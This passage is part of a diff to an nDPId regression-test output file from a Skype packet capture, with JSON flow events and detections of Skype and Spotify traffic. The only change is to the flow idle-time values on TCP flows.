{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1431969667145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EhFAAEAGRxvAqAEinTeClsOAAbtI+pnquVVQX4AQECy5ggAAAQEICj4i66JOt6Ek"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1431969667145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EhFAAEAGRxvAqAEinTeClsOAAbtI+pnquVVQX4AQECy5ggAAAQEICj4i66JOt6Ek"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SW0AAEAR5iPAqAEi1cezjTLdnE8AKQ5hnB4CGyqpujGNRC+tNfD9NfpLzFflMbzl80z6vtvIbjHD"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -409,8 +409,8 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAABBc7oAAEARJM\/AqAEiQTffITLdnEsALfH+nCYCgzglH2UUEeAloaKWvjnBLcR69MpntGSFdWneylROBFqJdg=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuzMAAEARQDfAqAEib91NmzLdnEQALFAWnCgCEvePRGLJGr6Sre+ODORDkQCce9O5GJ9D557YPiPEFuAx"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -420,10 +420,10 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431969668503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969668503,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABItzYAAEARPsPAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA749YAAEARS6HAqAEi1cezqDLdnEYAJ90VnCwCpNRKktf4Qi\/bdq+yPcZvRHBM0A5YqXcB1iPXfA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -454,12 +454,12 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2EcMAAEAR7TnAqAEib91KEzLdnEEAItfhnD4Cb3aeHJFamREFARmu+jDLOabt8VoC3Pk="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVldAAEAGAsbAqAEinTeCmcOGnEV7WkqhAAAAALAC\/\/\/tSQAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 